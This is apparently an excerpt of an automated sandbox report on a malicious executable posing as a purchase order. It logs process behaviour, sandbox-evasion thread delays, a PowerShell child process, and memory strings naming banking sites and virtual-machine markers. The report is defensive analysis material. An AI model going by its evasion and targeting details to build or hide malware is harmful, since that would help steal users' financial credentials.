                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: B70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 25F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 7480000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 8480000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 8630000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 9990000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: A990000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: B990000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: 4980000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599829Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599687Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599569Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597854Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595113Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 593735Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6056Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3587Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeWindow / User API: threadDelayed 1466Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeWindow / User API: threadDelayed 8337Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep count: 40 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7908Thread sleep count: 1466 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -599829s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -599687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -599569s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7908Thread sleep count: 8337 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -599235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep count: 39 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -599110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -598985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -598860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -598735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -598610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -598485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -598360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -598110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -597985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -597854s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -597735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -597485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -597360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -597235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -595113s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -593860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900Thread sleep time: -593735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599829Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599687Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599569Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597854Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 595113Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeThread delayed: delay time: 593735Jump to behavior
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3790108500.0000000000C77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
